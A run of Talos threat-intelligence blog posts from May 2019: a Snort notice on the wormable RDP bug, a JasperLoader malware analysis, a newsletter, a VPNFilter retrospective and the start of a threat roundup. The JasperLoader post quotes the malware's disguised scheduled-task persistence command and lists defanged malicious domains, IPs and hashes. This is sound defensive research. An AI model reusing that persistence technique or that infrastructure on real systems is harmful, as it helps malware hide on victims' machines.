Talos releases coverage for 'wormable' Microsoft vulnerability

May 21, 2019, 2:25 pm

≫ Next: Beers with Talos Ep. #53: Shiny happy election security (and ninjas)

≪ Previous: Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques

Last night, Cisco Talos released the latest SNORT® rule update, which includes coverage for the critical Microsoft vulnerability CVE-2019-0708.

The company disclosed this vulnerability last week as part of its monthly security update. This particular bug exists in Remote Desktop Services — formerly known as Terminal Services.

The vulnerability requires no user interaction and is pre-authentication. Microsoft specifically warned against this bug because it is "wormable," meaning future malware that exploits this vulnerability could spread from system to system. One of the most infamous examples of a worm was the WannaCry malware, which disabled major services across the globe in May 2017. An attacker could exploit this vulnerability by sending a specially crafted request to the target system's Remote Desktop Service via RDP.

Snort rule 50137 covers indicators associated with this vulnerability. You can learn more about this release at the Snort blog here.

↧

Beers with Talos Ep. #53: Shiny happy election security (and ninjas)

May 21, 2019, 2:24 pm

≫ Next: Sorpresa! JasperLoader targets Italy with a new bag of tricks

≪ Previous: Talos releases coverage for 'wormable' Microsoft vulnerability

Beers with Talos (BWT) Podcast Ep. #53 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Recorded May 10, 2019 — Election security has been a dominant headline for some time, so it’s high time we take a look at what that landscape looks like — where we are today, and how we got there in the first place. (Hint: there were deeper unintended consequences than Shiny Happy People on REM’s “Out of Time” album.) We anticipate gathering some first-time listeners due to the topic of this podcast... to you we say welcome, and yes, it’s always like this.

Matt kicks us off today discussing the greatest nerd rock band of all time: Ninja Sex Party. If you haven’t heard of them, you are in the wrong and should fix that quickly.

The timeline:

00:45 — Roundtable: The Dark Times are here, so we present to you, Ninja Sex Party.
16:15 — Election Security background: Let’s start with secret restaurants and smoking pineapples
22:30 — Thanks, Stipe. How REM set us up to fail, and what’s under the hood of the US voting system
38:00 — Where we are now versus even a couple years ago
53:40 — Closing thoughts and parting shots

Some other links:

==========

Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).

Hosted by Mitch Neff (@MitchNeff).

Subscribe via iTunes (and leave a review!)

Check out the Talos Threat Research Blog

Subscribe to the Threat Source newsletter

Follow Talos on Twitter

Give us your feedback and suggestions for topics: beerswithtalos@cisco.com

↧

Sorpresa! JasperLoader targets Italy with a new bag of tricks

May 23, 2019, 8:49 am

≫ Next: Threat Source newsletter (May 23)

≪ Previous: Beers with Talos Ep. #53: Shiny happy election security (and ninjas)

Nick Biasini and Edmund Brumaghin authored this blog post.

Executive summary

Over the past few months, a new malware loader called JasperLoader has emerged that targets Italy and other European countries with banking trojans such as Gootkit. We recently released a comprehensive analysis of the functionality associated with JasperLoader. Shortly after the publication of our analysis, the distribution activity associated with these campaigns halted. But after several weeks of relatively low volumes of activity, we discovered a new version of JasperLoader being spread. This new version features several changes and improvements from the initial version we analyzed. JasperLoader is typically used to infect systems with additional malware payloads which can be used to exfiltrate sensitive information, damage systems or otherwise negatively impact organizations.

The attackers behind this specific threat have implemented additional mechanisms to control where the malware can spread and are now taking steps to avoid analysis by sandboxes and antivirus companies. There's also a new command and control (C2) mechanism to facilitate communications between infected systems and the infrastructure being used to control them. The campaigns that are currently distributing JasperLoader continue to target Italian victims and further demonstrate that while JasperLoader is a relatively new threat, the developers behind it are continuing to actively refine and improve upon this malware at a rapid pace and introduce sophistication that is not commonly seen in financially motivated malware.

Delivery changes

As mentioned in our previous analysis of JasperLoader, the distribution campaigns attempting to spread this malware are relying heavily on certified email services in Italy. However, the actors have made some changes to the way distribution occurs.

The initial emails we saw contained ZIP files with VBS files inside them. These VBS files were similar to the VBS and DOCM files we saw in the previous campaign and began the infection process. The version with attached files didn't last long and was not very high in volume.

Shortly afterward, we saw a new shift away from using attachments directly. In the case shown below, you can see the initial email being sent through the typical certified email service that has been repeatedly leveraged by the actors behind JasperLoader.

Just as we saw previously, the email is written in Italian and states that the original message is included as an attachment. You can see the original email titled "postacert.eml" attached. The following pops up once the email is opened:

This is where the distribution process started to shift. There are not any attachments in the email, but instead, there is a hyperlink that makes a connection to hxxp:\\tribunaledinapoli[.]recsinc[.]com/documento.zip with a parameter that is referenced in the email. For example, above the full URL was hxxp:\\tribunaledinapoli[.]recsinc[.]com/documento.zip?214299. Note that the number 214299 is the number referenced in the email itself. When we initially saw this change, we immediately began to investigate and, initially, it appeared to be benign. The URL leads to an HTTP 302 response from the web server. HTTP 302 is the redirect code for temporarily moved and has been abused by adversaries for years, including the use of 302 cushioning by exploit kits several years ago.

This particular 302 redirected to www.cnnic[.]cn, which is the Chinese Internet Network Information Center (CNNIC), the organization responsible for internet affairs in the People's Republic of China. Obviously, this isn't the place that an adversary would send a potential victim to get compromised. It was at this point that we started looking at potential geofencing.

Geofencing is a technique that some adversaries use to ensure that all the victims are from a particular region or country and that researchers like us have more difficulty tracking down the activity. It's something we've seen repeatedly used by advanced adversaries but is not commonly done with crimeware threats like JasperLoader. In order to make that determination, we routed our traffic through Italian IP space and tried to follow the same link.

When the traffic is routed through Italian IP space, the results are drastically different. The request is met with a ZIP file that contains a malicious VBS file that is similar to the samples we found attached to emails earlier in the week. Once this VBS file is executed, the infection process kicks off and the loader is installed.

As we observed in previous campaigns, JasperLoader continues to leverage domain shadowing, and moves rapidly across subdomains that they control. The chart below shows the DNS resolution activity associated with one of the C2 domains leveraged by JasperLoader. The scope if fairly limited, but more than 95 percent of resolutions came from Italy, so the geofencing protections they put into place appear to be somewhat successful.

Let's now walk through the new infection process where we highlight some of the evolutions we've discovered.

JasperLoader functionality changes

The infection process associated with JasperLoader continues to feature multiple stages which are used to establish a foothold on systems, initiate communications with attacker-controlled infrastructure and implement the core functionality of the loader. While much of the process functions similar to what was described in our previous analysis of JasperLoader, there have been several notable changes to the malware's operation, which are described in the following sections.

Additional layers of obfuscation

Similar to what was previously seen in the JasperLoader infection process, the attackers rely upon several layers of obfuscation to attempt to hide the operation of the malware. In general, they leverage character replacement mechanisms and perform mathematical calculations at runtime to reconstruct the PowerShell instructions that will be executed on infected systems. This same process is used by the Visual Basic Script (VBS) downloader observed across these campaigns.

In current campaigns spreading JasperLoader, the attackers have introduced an additional layer of character replacement to further obfuscate the underlying PowerShell. Once the VBS has been deobfuscated, the underlying PowerShell is:

Replacing each of the characters in the previous image results in the Stage 1 PowerShell that is used to retrieve additional stages from attacker controlled servers. An example of this stage of PowerShell is:

This PowerShell is similar to what was seen in previous JasperLoader campaigns with a few notable differences.

Decoy documents

As can be seen in the PowerShell associated with Stage 1, a PDF is retrieved from the specified URL and displayed to the user. This PDF is not overtly malicious and is simply designed to function as a decoy document so that when a user executes the VBS, there's an expected result.

While victims will simply see the PDF above, in the background, the infection process is continuing with the malware attempting to retrieve Stage 2.

Geolocation filtering

One of the changes made in JasperLoader is the introduction of additional geolocation-based filtering. Geolocation-based filtering was also being leveraged during the delivery stage of the infection process. In previous versions of JasperLoader, the malware would use the Get-UICulture PowerShell cmdlet at each stage of the infection process and terminate if the system was configured to use the language pack associated with People's Republic of China, Russia, Ukraine or Belarus. The latest version of JasperLoader has added an additional check for Romanian and will exit if any of these language settings are in use.

Virtual machine/Sandbox detection

Another new feature that has been added in the latest version of JasperLoader is detection for hypervisor-based environments. In many cases, malware will perform various checks to determine if it being executed in a virtual environment and terminate execution to avoid being analyzed by sandbox or anti-malware solutions

The latest version of JasperLoader has introduced mechanisms that query the Windows Management Instrumentation (WMI) subsystem to obtain the model of the system that is being infected. The model identifier is then checked so see if it matches the following hypervisors:

VirtualBox
VMware
KVM

If so, the malware terminates execution and does not attempt to perform any additional actions on the system. These same checks are performed at each stage of the infection process.

Stage 3 functionality/Payload retrieval

While there have been minor changes at Stage 2, they are mostly related to file storage locations, file naming conventions, and other characteristics are frequently modified on a campaign by campaign basis, but the overall functionality and process of retrieving, deobfuscating, and executing Stage 2 to obtain Stage 3 remains relatively unchanged. For details of how this process works, please refer to our previous blog here.

The majority of the ongoing development activity appears to have been focused on Stage 3 of the JasperLoader infection process as that is where most of the JasperLoader functionality resides. The latest version of JasperLoader has changed how the malware attempts to persist across reboots, has introduced mechanisms to protect C2 communications, and added more robust mechanisms for ensuring that updates to JasperLoader get propagated efficiently to all of the systems that are part of the JasperLoader botnet.

Persistence mechanism

In previous versions of JasperLoader, the malware would obtain persistence on infected systems by creating a malicious Windows shortcut (LNK) in the Startup folder on the system. The latest version of JasperLoader accomplishes this using the Task Scheduler, as well. A scheduled task is created on infected systems using the following syntax:

schtasks.exe /create /TN "Windows Indexing Service" /sc DAILY /st 00:00 /f /RI 20 /du 24:59 /TR (Join-Path $bg_GoodPAth 'WindowsIndexingService.js');

This creates a Scheduled Task that will relaunch JasperLoader periodically. If this process fails, JasperLoader will then revert back to the use of the shortcut for persistence.

Failback C2 mechanism

One of the features that has been added to JasperLoader is a failback C2 domain retrieval mechanism that allows for time-based fluxing. A default C2 domain is specified. If that domain is not available, the current date on the system is used to generate a series of failback domains that the malware will attempt to use for C2 communications.

Bot registration

The malware has also implemented a new bot registration and ID generation mechanism and utilizes different pieces of information to create a unique identifier for each system than what was seen in previous versions of JasperLoader. As before, this information is communicated to the C2 as parameters within an HTTP GET request and is generated using the following:

Interesting PowerShell artifacts

One interesting artifact present in the PowerShell associated with Stage 3 of JasperLoader is in the function responsible for defining the C2 domain to use for future communications. The function is called BG_SelectDomen(). The word "domen" translates to "domain" and is a word that is widely used in multiple countries, including Romania.

While this is a low-confidence indicator, it is interesting in relation to the apparent targeting of this malware as well as the geolocational checking that is performed to determine whether it should continue to execute on infected systems.

Payload delivery

During our analysis of the latest JasperLoader campaigns, we were unable to receive the commands and URL information required to obtain a malicious PE32 from the attacker's C2 infrastructure. We did note that the C2 communications channel remained active and was beaconing.

This may be due to JasperLoader not being actively used to spread additional payloads at this time. The botnet operator may be attempting to obtain JasperLoader infections in order to build out capabilities so that they can be monetized for the purposes of leveraging the botnet to distribute additional malware in the future. We have seen reports indicating that GootKit may again be the payload of choice for this campaign. GootKit was the payload during the previous campaign we analyzed, so its inclusion in this campaign seems likely.

Conclusion

As illustrated by these new JasperLoader campaigns, adversaries are always going to take steps to try and increase their ability to infect victims, while at the same time evading detection and analysis. JasperLoader has taken that to the extreme and has quickly developed additional capabilities and added additional layers of obfuscation, while at the same time taking steps to evade virtual machines and geofence their victims in Italy. The majority of these changes came rapidly and demonstrate the author's commitment to making JasperLoader a robust, flexible threat that can be updated rapidly as security controls and detection capabilities change. Despite all these steps, we are still able to derive enough intelligence to expose their activities and protect our customers and the general public from their malicious intentions.

JasperLoader is another prime example of how rapidly threats can change and illustrates just how important threat intelligence is to ensuring that organizations are prepared to defend against them even as adversaries are constantly investing time, effort, and resources into improving upon their tools as they attempt to stay ahead of defenses deployed on enterprise networks. As techniques become less effective, cybercriminals will continue to move to other techniques to maximize their success in achieving their mission objectives. While JasperLoader is still relatively new compared to other established malware loaders out there, they have demonstrated that they will continue to improve upon this malware and leverage it against organizations. It is expected that as this botnet continues to grow, it will likely become more heavily leveraged for the distribution of various malware payloads as the operators of this botnet can make use of already infected systems at the push of a button or the issuance of a command.

Coverage

Ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware detailed in this post. Below is a screenshot showing how AMP can protect customers from this threat. Try AMP for free here.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Additional protections with context to your specific environment and threat data are available from the Firepower Management Center.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of compromise

The following IOCs are associated with various malware distribution campaigns that were observed during the analysis of JasperLoader activity.

Domains

A list of domains observed to be associated with JasperLoader are below.

breed[.]wanttobea[.]com
zzi[.]aircargox[.]com
nono[.]littlebodiesbigsouls[.]com
tribunaledinapoli[.]recsinc[.]com
tribunaledinapoli[.]prepperpillbox[.]com
tribunaledinapoli[.]lowellunderwood[.]com
tribunaledinapoli[.]rntman.com

IP addresses

A list of IP addresses observed to be associated with JasperLoader are below.

185[.]158[.]251[.]171
185[.]158[.]249[.]116

Hashes

A list of file hashes (SHA256) observed to be associated with JasperLoader are below.

052c9895383eb10e4ad5bec37822f624e443bbe01700b1fe5abeeea757456aed
54666103a3c8221cf3d7d39035b638f3c3bcc233e1916b015aeee2539f38f719
ee3601c6e111c42d02c83b58b4fc70265b937e9d4d153203a4111f51a8a08aab

↧

Threat Source newsletter (May 23)

May 23, 2019, 11:00 am

≫ Next: One year later: The VPNFilter catastrophe that wasn't

≪ Previous: Sorpresa! JasperLoader targets Italy with a new bag of tricks

Newsletter compiled by Jonathan Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

Election security is a touchy — and oftentimes depressing — topic of conversation. So why not let Beer with Talos bring some levity, and more importantly, expertise, to the conversation? The latest episode focuses solely on election security, as Matt Olney runs down what he’s learned recently from spending time with various governments.

On the research end of things, we released a post earlier this week outlining the details of a new campaign called “BlackWater” that we believe could be connected to the MuddyWater APT.

And since we know everyone was waiting on this, yes, there’s coverage for that wormable Microsoft bug everyone was talking about.

There was no Threat Roundup last week, but it’ll be back tomorrow.

Upcoming public engagements with Talos

Event: Copenhagen Cybercrime Conference

Location: Industriens Hus, Copenhagen, Denmark

Date: May 29

Speaker: Paul Rascagnères

Synopsis: Paul will give an overview of an espionage campaign targeting the Middle East that we called “DNSpionage.” First, he will go over the malware and its targets and then talk about the process the attackers took to direct DNSs. The talk will include a timeline of all events in this attack, including an alert from the U.S. Department of Homeland Security.

Event: Bsides London

Location: ILEC Conference Centre, London, England

Date: June 5

Speaker: Paul Rascagnères

Synopsis: Privacy has become a more public issue over time with the advent of instant messaging and social media. Secure Instant Messaging (SIM) has even become a problem for governments to start worrying about. While many people are using these messaging apps, it’s opened up the door for attackers to create phony, malicious apps that claim to offer the same services. In this talk, Paul will show various examples of these cloned applications and the different techniques used to send data back to the attacker.

Cyber Security Week in Review

The U.S. Department of Homeland Security issued a warning this week against Chinese-manufactured drones. Some of the drones may be collecting their users’ personal data and transferring it back to China.
A forum dedicated to hijacking online accounts and carrying out SIM-swapping attacks has been hacked. More than 113,000 users on OGusers had their login information, IP addresses and private messages exposed in an attack.
Cisco released patches for many of its devices, fixing a vulnerability in its Secure Boot process. However, the patches will only be released in waves, and some devices could remain vulnerable until November.
Some of the most popular Docker containers are open to attacks. Researchers recently discovered that 20 percent of the 1,000 most used containers are impacted by a misconfiguration, including those belonging to Microsoft, Monsanto and the British government.
San Francisco recently passed a ban on governmental use of facial recognition technology. The new law is likely to spark debates across the country between privacy advocates and law enforcement agencies.
The Trump administration is considering blacklisting Hikvision, a Chinese tech company that manufactures surveillance cameras. The move would prevent the company from purchasing American technology and would create another point of tension between the two countries.
Google disclosed that some G Suite users’ passwords have been mistakenly stored in plaintext for nearly 14 years. The company said the passwords stayed in its secure infrastructure, and the problem has been fixed.
Ireland opened a GDPR investigation into Google this week, specifically how the company uses personal data for advertising. Regulators say users’ personal information is stored by Google and then sold off to advertisers without their knowledge.
One year after the GDPR went into effect, Europe has received an estimated 145,000 privacy complaints.
The latest update to Mozilla Firefox fixes 21 security vulnerabilities, two of them rated “critical.” There are also new options for users to block “digital fingerprinting” on all sites.

Notable recent security issues

Title: Coverage available for critical vulnerability in Microsoft Remote Desktop Protocol
Description: Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 79 vulnerabilities, 22 of which are rated “critical," 55 that are considered "important" and one "moderate." This release also includes two critical advisories: one covering Microsoft Live accounts and another addressing updates to Adobe Flash Player. This month’s security update covers security issues in a variety of Microsoft’s products, including the Scripting Engine, the Microsoft Edge web browser and GDI+.

Snort SIDs: 50014 - 50025

Title: Multiple vulnerabilities in Wacom Update Helper
Description: Adobe disclosed 87 vulnerabilities in a variety of its products as part of its monthly security update. The majority of the bugs exist in Adobe Acrobat and Acrobat Reader. There are also critical arbitrary code execution vulnerabilities in Adobe Flash Player and Reader.
Snort SIDs: 48293, 48294, 49189, 49190, 49684, 49685

Most prevalent malware files this week

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256: 6dfaacd6f16cb86923f21217ca436b09348ee72b34849921fed2a17bddd59310
MD5: 7054c32d4a21ae2d893a1c1994039050
Typical Filename: maftask.zip
Claimed Product: N/A
Detection Name: PUA.Osx.Adware.Advancedmaccleaner::tpd

SHA 256: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b
MD5: 799b30f47060ca05d80ece53866e01cc
Typical Filename: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b.bin
Claimed Product: N/A
Detection Name: W32.Generic:Gen.22fz.1201

SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
MD5: e2ea315d9a83e7577053f52c974f6a5a
Typical Filename: Tempmf582901854.exe
Claimed Product: N/A
Detection Name: W32.AgentWDCR:Gen.21gn.1201

SHA 256:7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510
MD5: 4a50780ddb3db16ebab57b0ca42da0fb
Typical Filename: wup.exe
Claimed Product: N/A
Detection Name: W32.7ACF71AFA8-95.SBX.TG

↧

One year later: The VPNFilter catastrophe that wasn't

May 23, 2019, 1:24 pm

≫ Next: Threat Roundup for May 17 to May 24

≪ Previous: Threat Source newsletter (May 23)

Cisco Talos first disclosed the existence of VPNFilter on May 23, 2018. The malware made headlines across the globe, as it was a sophisticated piece of malware developed by a nation state, infecting half a million devices, and poised to cause havoc. Yet the attack was averted. The attacker’s command and control (C2) infrastructure was seized by the FBI, preventing the attacker from broadcasting orders to compromised devices. The attacker lost control of the infected systems, and potential catastrophe was prevented.

This was a wakeup call that alerted the cybersecurity community to a new kind of state-sponsored threat — a vast network of compromised devices across the globe that could stow away secrets, hide the origins of attacks and shut down networks.

This is the story of VPNFilter, and the catastrophe that was averted.

Network as the target

Network infrastructure is a tempting and useful target to attackers. Like any computing system, network devices such as routers and switches may contain vulnerabilities or misconfigurations that allow attackers to compromise the device. Once compromised, the device can be used as a point of incursion to search out and attack additional further systems, or the functionality of the device can be changed to the attacker’s will, and network traffic intercepted, modified or rerouted. Unlike many other computing systems, routers and switches are unlikely to be running anti-virus software, or be under active supervision by eagle-eyed administrators who may notice unusual activity.

In the weeks prior to the disclosure of VPNFilter, it was clear that network infrastructure was increasingly the target of state-sponsored threat actors. The activities of a threat actor associated with Russia had been observed and government agencies across the world published advisories warning organisations to take note^1,2,3.

Traces of VPNFilter

Someone registered the unobtrusive domain toknowall.com in December 2015. On May 4 2017 that domain was changed to point to an IP address hosted in France after it initially pointed at a Bulgarian hosting provider. Although nobody knew it at the time, this was one of the means by which the attackers were communicating with VPNFilter. This domain would remain active until the threat was neutralised on May 23, 2018.

By the end of August 2017, the FBI had been made aware of a home router exhibiting unusual behaviour. The device attempted to connect to a Photobucket account to download an image, behaviour that was clearly being driven by a malware infection⁴.

In fact, both the Photobucket accounts and the toknowall.com domain were hosting images in which the IP address of the C2 server, used by the threat actor to issue instructions to the malware were hidden, disguised within the EXIF metadata of the image.

By March 2018, additional malware samples were discovered that also reached out to Photobucket, and used toknowall.com as a backup in case Photobucket was unavailable. Analysing the malware samples showed that the threat actor let an important clue slip.

To keep important data within the malware confidential, the malicious code used encryption, implementing the RC4 encryption algorithm. However, the code implementing this algorithm included a subtle error, a mistake that was identical to exhibited by code used in the BlackEnergy attacks against Ukraine and elsewhere⁵. This code reuse from one attack to another allowed government agencies to identify that this attack originated from the group known as APT28 or “Sofacy.”⁶

BlackEnergy and APT28

Each threat actor group has their own mode of operation, preferences, and characteristics that they display as part of their attacks. For example, Group 123 is known to conduct attacks by distributing documents that reference politics on the Korean peninsula⁷. In contrast, the threat actor Rocke seeks to install cryptocurrency mining software on compromised devices by downloading code from Git repositories⁸. Threat actors frequently reuse code or infrastructure, which allows researchers to identify specific threat actor groups and track their campaigns⁹.

APT28, also known as Sofacy or Grizzly Steppe, is one of many threat actors that are followed by analysts. There is little doubt that this threat actor is part of the Russian Intelligence Services, that it is particularly active, and that it can cause chaos^10,11.

The BlackEnergy attack was one of the most notorious attacks from this group. BlackEnergy disrupted electrical power distributions in Ukraine in December 2015, which caused widespread power outages across the country⁷. A particular characteristic of this attack was a component that wiped disks, rendering infected devices inoperable and destroying forensic evidence which could have been used to understand exactly how the attack was conducted¹².

This intent to destroy systems and prevent recovery was one of the factors that made is so important to respond to VPNFilter swiftly.

Capability and intent

VPNFilter managed to exploit various network devices and affected over 500 000 devices in at least 54 countries. The modular architecture of the malware allowed the threat actor to install various different modules to conduct different malicious activities from the infected devices.

At its simplest, the malware contained the ability to ‘brick’ or render permanently inoperable the infected devices. Alternatively, the malware could be used as a point of ingress on a network, and subsequently used to discover and attack other systems connected to the affected device. One particular module contained functionality to identify and monitor Modbus network traffic, a protocol widely used in Industrial Control Systems.

A further module allowed the malware to create a giant Tor network comprising the many compromised systems. This network potentially allowed attackers to disguise the ultimate destination of data stolen from other compromised systems, or the country of origin of attacks against systems.

Clearly, capturing data, especially usernames and passwords, was one goal of the attack. The malware was capable of downgrading encrypted https connections to an unencrypted http connection, then saving that traffic for future collection. Similarly, anything that looked like a user credential or authorisation token could be identified, recorded, and subsequently collected.

Since the malware infected routers that direct network traffic to its intended destination, the malware could modify the routing information and create custom destinations for certain traffic; redirecting traffic from the genuine destination to a separate system under the control of the attackers. All of this is achieved without alerting the end user that anything was amiss.

The response

The number of affected systems grew throughout the spring of 2018. However, sharp spikes in the numbers of new infections were observed on May 8 and 17. This sudden growth was almost exclusively within Ukraine which pointed to imminent preparation of an attack.

At this point, Talos worked with partner organisations in the private and public sector to neutralise the threat. The FBI led efforts to seize the C2 infrastructure⁶, and in parallel, Talos informed members of the industry coalition group, the Cyber Threat Alliance, to ensure that the whole cyber security industry could act together to neutralise the threat ¹³.

The response was closely coordinated. Law enforcement took down the C2 infrastructure, cutting the ability of the attacker to send commands to the infected systems. The cyber security industry updated security products to detect and block VPNFilter, and issued advice to users on how to protect themselves.

We will never know the exact nature of the attack that was averted. The timing of the growth of infections suggested that Ukranian Constitution Day on June 29, the anniversary of NotPetya on June 27, or Orthodox Pentecost Monday on May 28 may have been target dates. The Security Service of Ukraine suggested that the attack would have been timed to disrupt the UEFA Champions League Final, which was taking place in Kiev on May 26¹⁴.

Protection

VPNFilter partly resided in memory, and partly on the storage media of the devices it infected. Rebooting the device would clear the memory resident part of the malware, but not stop the malware component residing in the device storage from initiating contact with the command and control systems. However, once that C2 was disabled, the persistent part of the malware could no longer receive instructions.

The remnants of the malware can be cleared by resetting devices to factory settings, followed by patching to the latest version to remove vulnerabilities. Although it is still unclear which vulnerabilities were exploited to install VPNFilter, all the types of devices that were compromised had known existing vulnerabilities.

Given their position in the network topology, perimeter network devices are always going to be exposed to attack. Unpatched devices with known vulnerabilities that are exposed to the internet are ripe for compromise by threat actors such as APT28.

Keeping such devices fully patched and correctly configured are vital parts of network hygiene. However, if this can’t be assured, then devices need to be placed behind next generation firewalls to detect and block the attacks before they impact on the vulnerable device.

Vigilance is also part of good network hygiene. VPNFilter was first detected by identifying the unusual network behaviour of an infected device. The network is ideally placed to be the sensor that detects and informs us of the actions of the bad guys.

Conclusion & Aftermath

Together, Talos and the FBI worked to identify and characterise VPNFilter. The malware’s multi-stage modular platform supported both intelligence-collection and destructive cyber attack operations. The campaign managed to infect over 500 000 devices in at least 54 countries. This malware could have been used to conduct a large-scale destructive attack, which would have rendered infected physical devices unusable and cut off internet access for hundreds of thousands of users. However, identification and characterisation of the threat, coupled with a coordinated response across the public and private sectors, stopped the attack before a catastrophe occurred.

The degree of collaboration across different organisations was unprecedented. There is always a balance to tread between keeping information private in order to maintain operational security, and sharing between partners to act together, maximising the impact against the threat actor to reduce the severity of an attack. There is evidence to suggest that Talos’ early engagement of the Cyber Threat Alliance in the case of VPNFilter has had a lasting legacy, helping to encourage others to engage in earlier, and more frequent sharing of data¹³.

The various malicious modules identified for VPNFilter give us an insight into the objectives and desires of the threat actor. Notably, infecting routers allows the threat actor to reroute network traffic from the intended legitimate destination to a malicious destination under the control of the attacker. Potentially this ability can be used to collect further usernames and passwords, and also to conduct man-in-the-middle attacks by intercepting and reading network traffic before passing it on to the intended destination.

APT28 is only one example of the many threat actors who continue to attempt destructive attacks. Talos recently discovered the Sea Turtle campaign. Although the unknown threat actor behind the attack is different from APT28, they also sought to reroute internet traffic in order to conduct man-in-the-middle attacks and collect user credentials. However, they achieved their objectives by a completely different approach than VPNFilter, by attacking the internet’s DNS infrastructure¹⁵.

Clearly, network infrastructure is in the sights of nation-state threat actors. We can expect that attackers will continue to seek to compromise these systems and continue to refine and develop the malware that they use to achieve their goals. Attackers can only learn from past failures. In the inevitable next wave of attacks, we can expect to see malware that leaves fewer traces in network traffic and has a more sophisticated C2 infrastructure that is more resistant to disruption.

The network is at the heart of our professional and social lives, and increasingly, our physical environment. The little devices that connect us to the network are often overlooked, but it is these systems allow our critical national infrastructure and enterprises to function.

VPNFilter teaches us that attackers have not overlooked the importance of these systems, and that those who may be seeking to disrupt our societies look to strike at the network. However, in attempting to conduct this attack, the threat actors have let slip their technologies and the capabilities that they are trying to develop. These clues help us in knowing where to look and how to search for the next attack in preparation.

Talos continues to use its unparalleled visibility of threats to analyse the changing threat landscape and to act together with partners to protect customers. Nevertheless, cyber security is everyone’s concern. We all have our part to play in protecting against the next attack by ensuring that we have adequate security protection, and that all our devices connected to the network are kept updated and fully patched.

We don’t know what the next major attack will be, but we continue to search for the hints and clues of an impending attack, so that we can disrupt the activity and stop catastrophes before they happen.

References

[1]. The Increasing Threat to Network Infrastructure Devices and Recommended Mitigations, US Department of Homeland Security. https://cyber.dhs.gov/assets/report/ar-16-20173.pdf

[2]. UK Internet Edge Router Devices: Advisory, UK National Cyber Security Centre. https://www.ncsc.gov.uk/information/uk-internet-edge-router-devices-advisory

[3]. Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices, US Department of Homeland Security. https://www.us-cert.gov/ncas/alerts/TA18-106A

. Affidavit in Support of an Application for a Seizure Warrant, US District Court for the Western District of Pennsylvania. https://www.justice.gov/opa/press-release/file/1066051/download

[5]. New VPNFilter malware targets at least 500K networking devices worldwide, Talos. https://blog.talosintelligence.com/2018/05/VPNFilter.html

[6]. Justice Department Announces Actions to Disrupt Advanced Persistent Threat 28 Botnet of Infected Routers and Network Storage Devices, US Department of Justice. https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected

[7]. Korea In the Crosshairs, Talos. https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html

[8]. Rocke: The Champion of Monero Miners, Talos. https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html

[9]. Groups, MITRE ATT&CK. https://attack.mitre.org/groups/

[10]. GRIZZLY STEPPE – Russian Malicious Cyber Activity, US Department of Homeland Security & Federal Bureau of Investigation. https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf

[11]. Reckless campaign of cyber attacks by Russian military intelligence service exposed, UK National Cyber Security Centre. https://www.ncsc.gov.uk/news/reckless-campaign-cyber-attacks-russian-military-intelligence-service-exposed

[12]. Cyber-Attack Against Ukrainian Critical Infrastructure, US Department of Homeland Security. https://ics-cert.us-cert.gov/alerts/IR-ALERT-H-16-056-01

[13]. Information Sharing in Action: CTA’s Incident Review of VPNFilter, Cyber Threat Alliance. https://www.cyberthreatalliance.org/information-sharing-action-cta-incident-review-vpnfilter/

[14]. The SBU warns of a possible large-scale cyberattack on state structures and private companies ahead of the Champions League final (via Google Translate), Security Service of Ukraine. https://ssu.gov.ua/ua/news/1/category/21/view/4823#.Xa4RX7cc.dpbs

[15]. DNS Hijacking Abuses Trust In Core Internet Service, Talos. https://blog.talosintelligence.com/2019/04/seaturtle.html

↧

Threat Roundup for May 17 to May 24

May 24, 2019, 10:49 am

≫ Next: Beers with Talos Ep. #54: Patch after listening, RDP and wild 0-days

≪ Previous: One year later: The VPNFilter catastrophe that wasn't

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 17 and May 24. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.

The most prevalent threats highlighted in this roundup are:

Doc.Downloader.Emotet-6971400-0
Downloader
